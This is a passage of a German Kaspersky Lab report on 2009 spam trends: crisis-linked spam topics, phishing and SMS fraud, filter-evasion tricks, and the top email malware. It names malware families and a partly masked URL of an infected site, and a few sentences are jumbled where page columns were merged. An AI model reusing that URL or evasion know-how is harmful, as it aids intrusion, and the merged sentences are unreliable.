thematischen Spam-Kategorien im Laufe des Jahres
einschneidende Veränderungen ergeben.
Wie die beiden Grafiken links unten zeigen, hat sich
der Anteil der Rubrik „Bildung“ im zweiten Halbjahr
mehr als verdoppelt und auch der Anteil der Kategorie
„Erholung und Reisen“ ist um das 2,5fache gestiegen.
Die Spitzenreiter des ersten Halbjahres mussten ihre
Führungspositionen aufgeben.

Imitate von Luxusgütern (Replikationen)
Spam und die Krise
An den unterschiedlichen SpamThemen des letzten Jahres lässt
sich auch der Verlauf der weltweiten Wirtschaftskrise ablesen.
Spam, der Waren und Dienstleistungen kleiner und mittlerer
Unternehmen bewirbt, hat seit
Beginn der Krise immer mehr
abgenommen. Dagegen gibt es
immer mehr Spam für kriminelle Dienstleistungen und unerwünschte Nachrichten mit Eigenwerbung der Spammer.
Spam-Verteilung nach thematischen Kategorien im ersten Halbjahr 2009
Spam-Verteilung nach thematischen Kategorien im zweiten Halbjahr 2009
Die folgenden fünf Themen wurden im Laufe des vergangenen
Jahres am häufigsten von den
Spammern eingesetzt. Die Veränderungen gegenüber 2008 stehen in Klammern.
Im August 2008 nahm der SpamAnteil aus dem realen Wirtschaftssektor erstmals ab und
sank trotz zwischenzeitlichem Anstieg bis zum Mai 2009 weiter –
dem Höhepunkt der Krise. Diese
Entwicklung hängt damit zusammen, dass die Auftraggeber dieser Spam-Versendungen meist
kleine und mittlere Unternehmen
sind. Sie haben die Krise entweder nicht überlebt, sind bankrott
gegangen oder haben die Ausgaben für Werbung gestrichen und
damit die Spam-Order eingestellt.
Die Spammer gingen daraufhin
intensiv auf die Suche nach neuer
Kundschaft. Die Menge an unerwünschten Mitteilungen, in denen
19
die Spammer sich selbst bewerben und die bis dahin
einen Anteil von 4 bis 5 Prozent am gesamten SpamAufkommen nicht überstiegen hatte, schnellte zum
April 2009 hoch und erreichte mit 19,7 Prozent ihren
Höhepunkt.
Solange die Auftraggeber ausblieben, mussten die
Spammer irgendwie verhindern, dass ihre Kapazitäten
ungenutzt bleiben. Denn auch sie müssen Miete für
Server und Botnetze zahlen. Dabei halfen ihnen so genannte Partner-Programme.
Partner-Programme sind eine Art des Internet-Marketings, die häufig zur Förderung von Waren und Dienstleistungen sowie bei der SEO eingesetzt werden (SEO
- Search Engine Optimization, zu Deutsch Suchmaschinenoptimierung, eine Maßnahme, um Websites im
Suchmaschinenranking möglichst weit oben zu platzieren). Der Sinn von Partner-Programmen besteht in der
Akquise von Käufern und Kunden über Dritt-Websites.
Das geschieht folgendermaßen: Der Partner platziert
auf seiner Website Banner oder Links auf die Site des
Auftraggebers. Klickt ein Besucher der Partner-Site auf
einen entsprechenden Link und bestellt auf der Website
des Auftraggebers Waren, so erhält der Partner einen
prozentualen Anteil am Gewinn des Online-Shops. In
einigen Fällen wird der Partner bereits dann entlohnt,
wenn ein potentieller Kunde die Website des Auftraggebers nur besucht.
Derzeit haben solche Partnerschaften auch im kriminellen Internet-Business Hochkonjunktur. Mit Hilfe dieser Partner-Programme werden rezeptpflichtige Medikamente ohne Rezept, Imitate von Luxusgütern und
billige Software an den Mann gebracht. Einen ähnlichen
Marketing-Ansatz verfolgt auch die Pornoindustrie, wobei der Partner für jeden auf die Website gelockten Anwender kassiert. Außerdem locken die Online-Betrüger
mit derartigen Methoden die User auch auf Websites
mit gefälschten Antiviren-Programmen und auf Seiten,
wo mit SMS-Betrügereien Geld gemacht wird.
An den in der Grafik dargestellten Anteilen lässt sich
gut der Verlauf der Krise ablesen. In der Regel handelt es sich bei den Auftraggeber-Firmen, die „Partnerschaften“ eingehen, um kriminelle Organisationen. Die
Auftraggeber hingegen, die direkt bei den Spammern
Mail-Versendungen bestellen, sind meistens kleine und
mittelständische Unternehmen. Die Grafik zeigt, dass
von Februar bis Mai die Menge an „traditionellem“ Spam
abnahm und im Mai ihren Tiefpunkt erreichte. In den
Wonnemonat fiel nach Experteneinschätzung auch der
„Höhepunkt“ der Krise. Beginnend mit Mai 2009 stieg
der Anteil an Spam wieder an, der Waren und Dienstleistungen kleiner und mittelständischer Unternehmen
anpreist, und der Anteil an „Partner-Spam“ begann zu
sinken. Auch die Menge an Spammer-Eigenwerbung
nahm ab. Bis zum Dezember waren alle diese Werte
wieder auf ihr Vorkrisenniveau zurückgekehrt.
Betrugsversuche durch Spam
In der zweiten Jahreshälfte 2009 stieg die Menge derjenigen Spam-Mails drastisch an, die in der thematischen
Rubrik „Computer-Betrug“ zusammengefasst sind.
Spammer, die an diesen Partner-Programmen teilnehmen, verdienen nicht pro Million versendeter E-Mails,
sondern an jeder Person, die durch Spam Waren gekauft hat.
Die folgende Grafik zeigt deutlich die Differenz zwischen der Menge an „Partner-Spam“ (Rubriken „Gesundheit und Medikamente“, „Imitate von Luxusgütern“,
„Spam für Erwachsene“, „Computer und Internet“ und
„Computerbetrug“) und der Menge an traditionellem
Spam. Dabei bezahlt der Auftraggeber die Spammer
für die Versendungen, die seine Waren oder Dienstleistungen bewerben („Bildung“, „Andere Waren und
Dienstleistungen“, „Erholung und Reisen“, „Makler“,
„Juristische Dienstleistungen und Audit“, „Druckereiwesen“). Zudem wird aus der Grafik ersichtlich, dass
die restlichen Kapazitäten für die Eigenwerbung der
Spammer genutzt werden.
20
Anteile von „traditionellem Spam“, „Partner-Spam“ und
Spammer-Eigenwerbung
Anteil der Kategorie „Computer-Betrug“ im Jahr 2009
Zu dieser thematischen Kategorie zählen PhishingMails, „nigerianische“ Mails, gefälschte LottogewinnBenachrichtigungen sowie SMS-Betrug und andere
Arten von Computer-Schwindel.
Phishing
In den letzten Monaten des Jahres 2009 kehrte die Anzahl an Phishing-Mails im E-Mail-Traffic praktisch wieder auf das Niveau vom Januar zurück.
SMS-Betrug in Spam
Anzahl von Mails mit Phishing-Links im E-Mail-Traffic
Auch im Jahr 2009 liegt das Bezahlsystem PayPal unter den am häufigsten angegriffenen Organisationen
wieder auf Rang Eins. Die Anziehungskraft, die PayPal auf Online-Betrüger ausübt, hat im gesamten Jahresverlauf nicht nachgelassen. Platz zwei belegt das
Internet-Auktionshaus eBay.
Die amerikanischen Großbanken Bank of America
und Chase belegen den dritten und vierten Platz des
Rankings. Aufgrund von großangelegten, jedoch nicht
lange andauernden Attacken befindet sich die Bank
Chase schon das zweite Jahr in Folge unter den fünf
am häufigsten angegriffenen Organisationen. Im vergangenen Jahr belegte diese Bank nur im August den
ersten Platz unserer Statistik. In den übrigen Monaten
kam sie teilweise nicht einmal in die Top 10.
Interessant ist die Platzierung der amerikanischen
Steuerbehörde IRS. Im September 2009 begannen die
Cyberkriminellen diese Organisation anzugreifen – kurz
Neben Phishing, „nigerianischen“ Mails und gefälschten Benachrichtigungen über Lottogewinne zählen SMS-Betrugsversuche schon das zweite Jahr in
Folge zur Rubrik „Computerbetrug“. Durch diese Mitteilungen soll der Empfänger auf die eine oder andere
Weise dazu gebracht werden, teure SMS-Nachrichten
an kurze Premium-Nummern zu senden. Vom Konto
des Anwenders wird unerwartet eine nicht unerhebliche Summe abgebucht, und er kommt in der Regel
nicht in den Genuss der versprochenen Gegenleistung.
Spam dieser Art kommt fast ausschließlich in Russland
und der Ukraine vor. In anderen Ländern ist es bedeutend komplizierter, Kurznummern mit Präfixen zu mieten. Vor allem aber müssen Personen, die solche Nummern mieten, detaillierte Angaben über sich machen,
und Betrüger können daher relativ problemlos zur Verantwortung gezogen werden.
Im Frühjahr 2009 nahm die Anzahl von
Phishing-Mails merklich ab. Nach Experteneinschätzungen war auch im Frühling der Höhepunkt der Wirtschaftskrise erreicht. Die erneute Zunahme von
Phishing-Mails im August 2009 fiel mit
dem langsamen Abklingen der Krise zusammen. Der durchschnittliche Anteil
von Phishing-Mails am gesamten E-MailTraffic betrug gerechnet auf das Jahr 0,86
Prozent. Die Erwartung, dass die schwierige wirtschaftliche Situation die Aktivität der Phisher nur erhöhen würde, hat Organisationen, die im Jahr 2009 Phishing-Attacken ausgesetzt waren
sich nicht erfüllt. Allem Anschein nach
kamen sie vielmehr zu dem Schluss, dass die Anwennach Verstreichen der letzten Frist zur Einreichung der
der in einer angespannten Wirtschaftlage aufmerkSteuererklärungen. Im Laufe der drei Herbstmonate
samer und vorsichtiger sind und ihre Ersparnisse nicht
schaffte die IRS den Sprung unter die zehn am häuso leicht aufs Spiel setzen. Da sich die ökonomische
figsten von Phishern angegriffenen Organisationen.
Situation nun aber wieder entspannt, sollte das Geld
nach Ansicht der Phisher vermutlich wieder lockerer
Seit Beginn des Sommers beobachtet Kaspersky
sitzen und die Vorsicht nachlassen. Zudem ist jedes
Lab eine Vielzahl unterschiedlicher Phishing-VersenPhishing-Projekt auch mit Ausgaben verbunden und
dungen, die sich gegen Spieler des beliebten Ondaher in weniger krisengeplagten Zeiten leichter umline-Games World of Warcraft richten. Auch an den
zusetzen.
Accounts von sozialen Netzwerken sind die Kriminellen
interessiert. Ende des Jahres konzentrierten sich die
Phisher insbesondere auf die User von Facebook.
Als diese Betrugsart sich im Jahr 2008 gerade erst
etablierte, setzten die Kriminellen noch klassische
Social-Engineering-Methoden ein wie zum Beispiel
Gewinnbenachrichtigungen, Drohungen, den Account
zu blockieren oder Werbung für preiswerte Pornos. Im
Jahr 2009 war der Schwindel dagegen schon viel kreativer – um den Anwender dazu zu bringen eine SMS
zu verschicken, wurden die unglaublichsten Themen
aufgetischt.
21
Am beliebtesten waren dabei „Audiodrogen“ und das
Orten von Personen über das Mobiltelefon.
Größe und Typen von Spam-Mails
Der erste Köder bestand in MP3-Files, die angeblich in
der Lage sind, beim Hörer verschiedene und mit einem
Drogenrausch vergleichbare Bewusstseinszustände
hervorzurufen. Im zweiten Fall versprachen die Betrüger, allein an der Nummer des Mobiltelefons herauszufinden, wo sich eine bestimmte Person gerade aufhält.
Um diese Services in Anspruch nehmen zu können,
sollten die Anwender per SMS bezahlen. Dabei war die
Gebühr für die SMS bedeutend höher als angekündigt,
was wiederum typisch für SMS-Betrug ist.
Auf den Prüfstand gestellt erwiesen sich beide Dienstleistungen allerdings als Schwindel. Um allzu vertrauensselige User zu warnen, wurde auch in der Presse
darüber berichtet, dass MP3-Files unmöglich verschiedene drogenrauschartige Zustände auslösen können.
Die Gauner zur Verantwortung zu ziehen ist allerdings
schwierig. Auf ihren Sites haben sie häufig eine Rubrik
mit der Überschrift „Regeln“ platziert, die meist schwer
zu finden ist beziehungsweise in kleiner Schrift oder in
schwer zu erkennender, heller Farbe dargestellt wird. In
dieser Rubrik wird die jeweilige Dienstleistung respektive deren Wirkungslosigkeit realistisch beschrieben und
auch der tatsächliche Preis für die SMS genannt. Auf
der dazugehörigen Website steht folgendes in der Rubrik „Regeln“:
Haftungsausschluss
а) Der Anwender nutzt den Service auf eigene Verantwortung und eigenes Risiko. Die Leistungen des
Service werden dem Anwender „wie vorhanden“ zur
Verfügung gestellt. Der Anbieter übernimmt keinerlei
Verantwortung – inklusive, aber nicht ausschließlich für
die Übereinstimmung der Suchergebnisse mit der Anfrage des Anwenders;
b) Die Website beinhaltet ein Spiel mit unterhaltendem
Charakter. Alle auf der Website präsentierten Informationen sind erfunden und sollten nicht ernst genommen
werden.
Unter anderem wird der User in dieser Rubrik auch darüber informiert, dass eine SMS, mit der für den Service
gezahlt wird, statt 5 Rubel etwa 300 Rubel kostet (zirka
10 US-Dollar).
In einzelnen Fällen forderten die Spammer als Entlohnung für ihre Dienste den Versand nicht einer, sondern
drei teurer SMS-Nachrichten und versprachen dafür
Zugriff auf eine kostenpflichtige Ressource. Wer der
Aufforderung nachkam, erhielt Links auf Websites, deren Angebote sich nach Prüfung als kostenlos herausstellten. Daher ist äußerste Vorsicht geboten, und es
gilt: Überprüfen Sie die Kosten für eine SMS vor deren
Versand und trauen Sie niemals den Versprechungen
in einer Spam-Mail.
Verteilung von Spam-Typen im ersten und zweiten
Halbjahr 2009
Das Verhältnis der Typen von Spam-Mails war relativ
beständig. Wie gehabt führen Nachrichten im Format
text/plain das Ranking an. Ihr Anteil blieb im Laufe des
Jahres praktisch unverändert und betrug zwischen 45
und 46 Prozent.
Text/html ist der zweite Spitzenreiter unter den Mail-
Typen und konnte seine Position in der zweiten Jahreshälfte erheblich verbessern. Sein Anteil stieg von
31,6 Prozent im ersten Halbjahr auf 39,1 Prozent bis
Ende 2009.
Bei Mails mit Grafik-Anhängen gab es allerdings Veränderungen. Im ersten Halbjahr waren hier Anhänge im
Format image/jpeg die unangefochtenen Spitzenreiter.
Ab Mitte des Jahres begann sich der Anteil von Mails
mit image/jpeg-Anhängen zu verringern, und gegen
Ende 2009 mussten sie die Führungsposition an das
Format image/gif abtreten.
Zum größten Teil ist das damit zu erklären, dass die
Spammer für Grafiken, die ausschließlich Text enthalten, das Format image/gif vorziehen.
In der im folgenden dargestellten Beispiel-Mail sind
drei grafische Anhänge enthalten: Der erste ist vom
Format image/jpeg und zeigt das Foto des Sportlers
22
und der Tabletten. Der schwarze Text „We respect your
rights…“ und die grauen Buchstaben „If you wish…“
sind Anhänge im Format image/gif.
Derartige Versendungen sind kein Problem für die
Spam-Filter, obwohl es sich um innovative Spam-Neuheiten handelt. Insbesondere deshalb, weil im Rahmen
einer Versendung nur sehr selten Links auf verschiedene Clips enthalten sind (in den von uns registrierten
Fällen nicht mehr als zehn). Eine Versendung von ein
und derselben URL zu blockieren stellt außerdem kein
Problem für die Filter dar.
Das Verhältnis der Spam-Mails bezüglich ihrer Größe
hat sich nicht wesentlich geändert:
Die Spammer verwendeten auch einige Tricks aus dem
Vorjahr, die sie allerdings entscheidend verbessert hatten. Eine dieser Maschen bestand in der Darstellung
eines Werbeangebotes oder einer Kontaktinformation
völlig ohne Buchstaben oder Grafiken, sondern allein
mit Hilfe von HTML. Diese Methode ist nicht mehr neu,
doch im vergangenen Jahr wurde sie perfektioniert und
funktioniert folgendermaßen: In die Mitteilung wird eine
Tabelle mit einer Vielzahl von Zellen eingefügt, wobei
einige Zellen leer, andere mit dunkler Farbe gefüllt
sind. Die Zusammensetzung der eingefärbten und leeren Zellen ergibt dann in der Browseransicht den von
den Spammern gewünschten Text.
Früher verwendeten Spammer zu diesem Zweck Tabellen mit recht großen Zellen, so dass nur reichlich
sperrige und kaum leserliche Buchstaben und Zahlen
zustande kamen. Im vergangenen Jahr kamen die
Spammer dahinter, dass das Schriftbild ungleich besser wird, wenn sie dafür Tabellen mit winzigen Zellen
verwenden. Also erschienen Mitteilungen wie diese:
Ganz zu Ende des Jahres griffen die Spammer zu
einem anderen interessanten Trick, der allerdings nicht
neu ist: Sie versendeten Spam in Form von MP3-Anhängen. In den Audiodateien nannte eine angenehme
weibliche Stimme den Namen einer Site, auf der Viagra bestellt werden kann. Der Titel des Tracks und die
Sprecherin verwiesen auch auf die Website der Spammer. Im Hintergrund spielten die Spammer ein zum
Thema passendes weibliches Stöhngeräusch ab.
Größen von Spam-Mails
Wie gehabt besteht ungefähr die Hälfte des gesamten
Spam-Aufkommens aus Mails von geringer Größe, das
heißt bis zu 5 KB. Bei der überwiegenden Mehrheit dieser Mitteilungen handelt es sich um Mails mit kurzem
Text im Format text/plain oder text/html. Allerdings gibt
es auch sehr selten Mitteilungen mit Grafiken, die eine
Größe von 5 KB nicht übersteigen.
Methoden und Tricks der Spammer
Die wichtigste Neuerung des Jahres 2009 ist wohl die
Ausnutzung des Services YouTube zur Verbreitung von
Videospam. Im Oktober wurden verschiedene Versendungen mit Links auf Werbeclips erfasst, die bei YouTube hinterlegt waren. Alle diese Versendungen ent
hielten Eigenwerbung der Spammer.
Eine andere Methode, die sich im Jahr 2009 entscheidend verändert hat, ist die Verwendung von Bildern
mit wechselndem Hintergrund. Damit sollen die SpamFilter nicht feststellen können, dass in den einzelnen
Nachrichten innerhalb einer Spam-Versendung diesel-
23
ben Werbeangebote enthalten sind und im Text auch
keine für Spam typischen Wörter und Phrasen erkennen können. Dazu setzten die Spammer bereits im
Jahr 2006 an verschiedenen Stellen der Grafik auf ein
„Hintergrundrauschen“ in Form von dunklen Punkten,
Flecken und manchmal auch geometrischen Figuren.
Diese Maßnahme hat allerdings nicht dazu beigetragen, dass sich das Äußere der Nachricht nach ästhetischen Gesichtspunkten verbesserte. Zudem litt häufig
die Lesbarkeit der E-Mail darunter.
Im Jahr 2009 kombinierten die Spammer das „Rauschen“ der Grafik nun mit einem angenehmen Erscheinungsbild der Mail. Anstelle eines verzerrten und das
Auge beleidigenden Wirrwarrs nahmen sie als Hintergrund das Foto einer attraktiven jungen Frau. Um eine
möglichst große Anzahl von Varianten ein und desselben Bildes zu erhalten, wurde das Foto in mehrere Teile
„zerschnitten“. Bei der Darstellung im Browser fügen
sich diese Teile wieder zusammen, und das Ergebnis
kann sich sehen lassen:
Diese Methode tauchte erstmals in englischsprachiger
Werbung für medizinische Präparate auf, wurde jedoch
schnell auch in der Werbung für russischsprachigen
Porno-Spam übernommen:
Staaten von Amerika, war im Jahr 2009 der beliebteste
Prominente bei den Spammern. Sein Name wurde
nach seinem Amtsantritt am 20. Januar überaus häufig
zu Spam-Zwecken missbraucht und tauchte im Laufe
des gesamten Jahres immer wieder in unerwünschten
Mitteilungen aller Art auf – in erfundenen „Sensationsmeldungen“, in kompromittierenden Nachrichten sowie
in „nigerianischen“ E-Mails.
Auch das Thema Schweinegrippe haben die Spammer
nicht ausgelassen. Unter marktschreierischen Überschriften, die Schutz vor dieser Krankheit versprachen,
verbreiteten sie Links auf „kanadische“ Pharma-Shops,
die mit Viagra handeln. Mit zunehmender Panik vor der
Schweingrippe, die im September 2009 ihren Höhepunkt erreichte, ersannen die Spammer immer interessantere Angebote wie etwa die Impfung mit einem nicht
existierenden Impfstoff oder den Handel mit Mundschutzmasken.
Unmittelbar nach dem Tod von Michael Jackson am
25. Juni wurden die ersten Versendungen abgesetzt,
die dieses Thema ausnutzten. Sie enthielten Links
auf kanadische Pharma-Shops und auf Websites mit
Malware. Den ganzen Sommer über riss die Flut von
Spam-Mails nicht ab, die sich auf den Tod des King of
Pop bezogen.
Doch auch das Ende des Sommers war nicht das Ende
dieses Themas in Spam-Versendungen. Bis zum heutigen Tag trifft man in unerwünschten Nachrichten zum
Beispiel auf das Angebot, „einen Anzug“ von Michael
Jackson zu kaufen oder einen „posthumen Videoclip“
herunterzuladen. Bereits im November erreichte uns
eine Versendung mit dem Betreff „Michael Jackson
lebt! Sehen Sie hier den Beweis!“. Die Mail enthielt
einen Link auf eine Site, auf der Trojan.Script.Iframer
lauerte.
Selbstverständlich gab es viele andere Themen, die die
Aufmerksamkeit der Spammer auf sich zogen. Da sind
zum einen die Feiertage, angefangen mit dem Internationalen Frauentag am 8. März bis zu Thanksgiving.
Zum anderen sind es aber auch die Qualifikationsspiele für die Fußball-WM und die Premieren aufwändiger Filmproduktionen. Genau diese Themen waren
über einen langen Zeitraum am stärksten in den SpamVersendungen vertreten.
Spam und soziale Netzwerke
Derartige Methoden kamen bereits im Jahr 2006 zum
Einsatz und sind nun nach einer gewissen Ruhepause
wieder auf dem Markt.
Ein anderer Trick mit grafischem Spam ist die Verzerrung des in der Grafik enthaltenen Werbetextes, so
dass die Textzeilen in „Wellen“ erscheinen.
Sehr beliebt ist unter Spammern nach wie vor die Verwendung aktueller Themen und bekannter Persönlichkeiten. Barack Obama, der Präsident der Vereinigten
24
Spam in sozialen Netzwerken ist derzeit extrem populär. Ohne Moderation und deaktivierte anonyme Kommentare in den Communitys wäre der Anteil von Spam
in Blogs und sozialen Netzwerken schlicht katastrophal
hoch.
Doch auch im herkömmlichen E-Mail-Spam wird die
Beliebtheit sozialer Netzwerke intensiv ausgenutzt. Erstens erhält der User per E-Mail verschiedene Benachrichtigungen, die häufig Spam enthalten. Und zweitens
nutzen die Spammer die sozialen Netze und Blogs
einfach als eine weitere Plattform zur Verbreitung ihrer
Werbung, auf die in E-Mails verwiesen wird. Über Spam
Die Spammer verwenden die Namen großer Netzwerke und Blogs, um die Filter zu umgehen und die
Aufmerksamkeit der Anwender auf sich zu ziehen. Diese vertrauen einer Fälschung eher, wenn sie im Namen
eines sozialen Netzwerks daher kommt. Zudem gibt es
recht häufig Phishing-Attacken auf soziale Netzwerke,
um den Anwendern ihre Zugangsdaten zu entlocken. In
der Regel sind davon die populärsten Netze betroffen
– im vergangenen Jahr waren es vor allem Facebook
und Twitter.
In der unten abgebildeten Phishing-Mail wird der User
aufgefordert, seinen Facebook-Account zu aktualisieren und zu diesem Zweck zunächst auf einen Link zu
klicken. Der Link führt auf eine Website der Betrüger,
auf der Facebook-Anwender aufgefordert werden, ihre
Zugangsdaten einzugeben:
Man sieht also, dass E-Mail-Spam und Spam in so
zialen Netzwerken eng miteinander verknüpft sind. Mit
Hilfe von E-Mail-Spam werden den Usern über Viren
und Phishing die Zugangsdaten zu sozialen Netzwerken abgeluchst. Nachdem der vertrauensselige Anwender auf einen schädlichen Link geklickt hat, wird
der so infizierte Computer Bestandteil eines Botnetzes
und verschickt nun Spam an soziale Netzwerke. Um
Waren und Dienstleistungen besser absetzen zu können, werden im E-Mail-Spam die Namen bekannter sozialer Netze sowie ihre Plattformen genutzt.
Schadprogramme in E-Mails
Im Jahr 2009 enthielten 0,85 Prozent aller E-Mails
schädliche Anhänge. Dieser Wert ist nur um 0,04 Prozent geringer ist als der entsprechende Durchschnittswert des Jahres 2008.
Die unten abgebildete Grafik zeigt, dass die meisten
Mails mit schädlichen Anhängen sowohl 2008 als auch
2009 in den letzten Monaten des Jahres verschickt wurden. Während 2008 auch im März ein solcher Höhe
punkt zu verzeichnen war, lag der Anteil an E-Mails mit
schädlichen Anhängen im Jahr 2009 zwischen Februar
und August nie höher als 0,4 Prozent.
werden neue unbekannte Netzwerke angepriesen, die
sich häufig als Kontaktseiten erweisen und sich lediglich mit der Bezeichnung „soziales Netz“ tarnen.
Fälschungen so beliebter Services wie Twitter wurden
allerdings nicht nur zum Phishing, sondern auch zur
Verbreitung von Viren benutzt.
Die folgende gefälschte Einladung zu Twitter enthielt
einen Zip-Anhang mit einem Virus:
Anteil von E-Mails mit schädlichen Anhängen in den
Jahren 2008 und 2009
Der Anstieg an schädlichem Spam im Herbst 2009
geht vor allem auf das Konto von Zbot (ein trojanisches
Spionageprogramm, das es auf vertrauliche Anwenderdaten abgesehen hat und als Benachrichtigung vom
Finanzamt getarnt ist) und E-Mails zurück, über die
Betrüger Trojaner der Familie Fraudload verbreiteten.
FraudLoad-Trojaner installieren auf dem Rechner des
Anwenders verschiedene Fraud Tools (falsche Tools).
In erster Linie handelt es sich dabei um vermeintliche
Antiviren-Programme, mit deren Hilfe die Cyberkriminellen von den Anwendern Geld erpressen. Sie bieten ihnen an, angeblich auf dem Computer der User
gefundene Schadprogramme zu desinfizieren oder zu
entfernen.
25
Die Top 10 der im Jahr 2009 im E-Mail-Traffic verbreiteten Schädlinge setzt sich folgendermaßen zusammen:
Der Missbrauch von Namen großer Organisationen
und Unternehmen zum Versand von Schadprogrammen beschränkte sich allerdings nicht auf diese PostОrganisationen. „Offizielle Mitteilungen“ kamen auch
von WesternUnion und Fedex sowie von verschiedenen Internet-Shops, in denen die Anwender angeblich diverse hochpreisige Waren gekauft haben.
Hinsichtlich ihrer Struktur ähnelten sich die Mails, was
auf denselben Autor schließen lässt. Dieser Verdacht
bestätigte sich endgültig, als die Experten von Kaspersky Lab die folgende Nachricht erhielten:
Тоp 10 der schädlichen Programme im Jahr 2009
Wie auch schon im Jahr 2008 führt ein Schädling der
Familie Iframe die Top 10 des Jahres 2009 mit großem Abstand an. Trojan-Clicker.HTML.IFrame.abn ist
ein Schadprogramm in Form eines HTML-Dokumentes
und wird direkt aus der HTML-Version der Mail oder
aus einem HTML-Anhang ausgeführt. Das Schadprogramm enthält ein Skript, welches unbemerkt vom
Anwender eine Verbindung zur infizierten Website
http://ddhj.2288.org/d[****]2.htm herstellt. Interessant
ist, dass Trojan-Clicker.HTML.IFrame.abn der einzige
Vertreter der HTML-Plattform in der Hitliste des Jahres
2009 ist – alle anderen Schädlinge laufen auf Win32,
der populärsten Plattform.
Auf dem zweiten und siebten Platz der Top 10 befinden sich zwei Varianten der Schadfamilie FraudLoad:
Trojan-Downloader.Win32.FraudLoad.epb und TrojanDownloader.Win32.FraudLoad.wspk. Im September
gehörten mehr als die Hälfte aller per Spam-Mails in
Umlauf gebrachten Schädlinge zu dieser Familie.
Platz drei und sechs belegen Schadprogramme, die mit
Hilfe zweier Versionen des Packers Krap:Packed komprimiert werden. Win32.Krap.ah und Packed.Win32.
Krap.w werden normalerweise zum Packen von Zbot
und FraudTools verwendet, Packed.Win32.Krap.w zudem auch bei Iksmas und Bredolab.
Der berüchtigte Schädling Trojan-Downloader.Win32.
Murlo.cba landete auf Platz vier. Im September war er
der Spitzenreiter in unserem Monatsranking.
Wie zu erwarten, schafften es auch zwei Varianten
des bereits erwähnten Schadprogramms Zbot in die
Jahres-Hitliste: Trojan-Spy.Win32.Zbot.zur und TrojanSpy.Win32.Zbot.gen.
Platz 8 und 9 belegten schließlich zwei Spielarten der
Backdoor Small: Backdoor.Win32.Small.zs und Backdoor.Win32.Small.zо.
Zur auffälligsten Methode bei der Verbreitung von Malware gehören in diesem Jahr gefälschte Nachrichten
offizieller Stellen mit angehängten Zip-Archiven. Die
umfangreichste Versendung hatte den Betreff “Benachrichtigungen von DHL und UPS”.
26
Hier sind die Spammer eindeutig durcheinander geraten, als sie für den Absender und die Unterschrift ein
anderes Unternehmen einsetzten als in der Betreffzeile.
Gefälschte E-Cards, die angeblich von dem bekannten
Unternehmen Hallmark und anderen Karten-Services
stammen, wurden ebenfalls beim Social Engineering
eingesetzt, um den Anwender dazu zu bringen, Mal
ware auf seinen Rechner zu laden.
Es versteht sich von selbst, dass für den MalwareVersand auch aktuelle Themen missbraucht wurden.
Dazu zählt zum Beispiel der Tod des King of Pop, der
Start des Großen Hadronen-Speicherrings und die Veröffentlichung des Betriebssystems Windows 7. Häufig
enthielten die schädlichen Mails keine Anhänge, sondern Links auf Websites mit einem Schadprogramm.
Fazit
2009 ist das Jahr der Weltwirtschaftkrise und war für
viele Vertreter des Cyberkriminellen-Business ein
schwieriges Jahr. So hat die Krise auch die Spammer
nicht verschont, und die Zahl ihrer Aufträge ging Mitte des Jahres stark zurück. Der Anteil von Spam im
E-Mail-Traffic sank dagegen nicht, denn die Spammer nahmen aktiv an Partner-Programmen teil. Darüber hinaus diente Spam im Laufe des Jahres als eine
Art Krisen-Indikator, mit dessen Hilfe sich auch Zukunftsprognosen machen lassen.
Sehr hoch war der Anteil an Spammer-Eigenwerbung
in diesem Jahr. Er betrug zeitweise 20 Prozent des
gesamten Spam-Aufkommens. Auf diese Weise versuchten die Spammer in Krisenzeiten neue Kunden an
Land zu ziehen.
Dabei war der Anteil von Phishing im E-Mail-Traffic erstaunlicherweise nicht hoch: Auf dem Höhepunkt der
Krise nahm der Anteil nicht zu, sondern sank sogar
merklich ab.
Anders als die qualitative Zusammensetzung der Malware in Spam hat sich die Menge an Schadprogrammen im E-Mail-Traffic im Vergleich zum Jahr 2008 nicht
wesentlich verändert. Sehr beliebt bei den Cyberkriminellen waren trojanische Programme, die gefälschte
Antiviren-Software auf die Computer der Anwender
laden.
Wie gehabt kam die größte Spam-Menge auch im Jahr
2009 aus den USA, wobei die asiatischen und lateinamerikanischen Länder merklich aufgeholt haben. Dieser Trend ist durchaus nachvollziehbar: Die Zahl an
Computern und Breitband-Internetzugängen wächst in
diesen Regionen beständig, und gleichzeitig kennen
dort bei weitem nicht alle Anwender die Grundregeln
der Internetsicherheit. Dementsprechend fällt es leichter, deren Computer mit einem Schadprogramm zu infizieren und in ein Zombie-Netz einzugliedern.
Das Jahr 2010 wird vermutlich sehr viel ausgeglichener
und ruhiger werden. Der Spam-Anteil am E-Mail-Traffic
wird sich auf demselben Niveau wie zum gegenwärtigen Zeitpunkt bewegen. Dabei ist ein leichter Anstieg
möglich. Der im Jahr 2009 so populäre SMS-Betrug
könnte zurückgehen, insbesondere dann, wenn sich
die Mobilfunkanbieter dem entschieden entgegenstellen. Dann erwarten uns aber vermutlich neue Betrügereien und Tricks.
Methoden wie der Einsatz von Videos und Audiodateien
in Spam werden sich kaum durchsetzen: Die Balance
zwischen der E-Mail-Größe, den Vorteilen bei der Umgehung der Spam-Filter und der Anziehungskraft auf
den Anwender fällt eindeutig zu Ungunsten der Spammer aus. So werden die Spammer auf althergebrachte
und bewährte Tricks zurückgreifen. Unter anderem ist
zu erwarten, dass sie auch in diesem Jahr die Namen
beliebter sozialer Netzwerke ausnutzen werden. Und
in den Netzwerken selbst wird die Spam-Menge weiter
zunehmen.
Kaspersky Lab
Kaspersky Lab ist Europas größtes Unternehmen für
Antivirus-Technologie und reagiert im weltweiten Vergleich von Antivirus-Herstellern meist am schnellsten
auf IT-Sicherheitsbedrohungen wie Viren, Spyware,
Crimeware, Hacker, Phishing-Attacken und Spam.
Das Unternehmen gehört zu den weltweit vier erfolgreichsten Herstellern von Sicherheits-Lösungen
für den Endpoint (IDC 2008). Die Produkte von Kaspersky Lab haben sich sowohl bei Endkunden als
auch bei KMUs, Großunternehmen und im mobilen
Umfeld durch ihre erstklassigen Erkennungsraten
und kurzen Reaktionszeiten einen Namen gemacht.
Das ganze Jahr hindurch versuchten die Spammer intensiv, die Qualität ihrer Werbung zu verbessern. Zum
einen, um die Spam-Filter auszutricksen und zum anderen, um bei den Usern einen guten Eindruck zu hinterlassen. Neben den traditionellen Methoden kamen
dabei auch Multimedia-Technologien zum Einsatz –
die Spammer stellten Clips auf YouTube ein und verschickten Audiodateien.
Neben den Stand-Alone-Lösungen des Security-Experten ist Kaspersky-Technologie Bestandteil vieler
Produkte und Dienstleistungen führender IT-Sicherheitsunternehmen.
Kontakt
Kaspersky Labs GmbH
Steinheilstr. 13
85053 Ingolstadt
Telefon: +49 (0)841 981 89 0
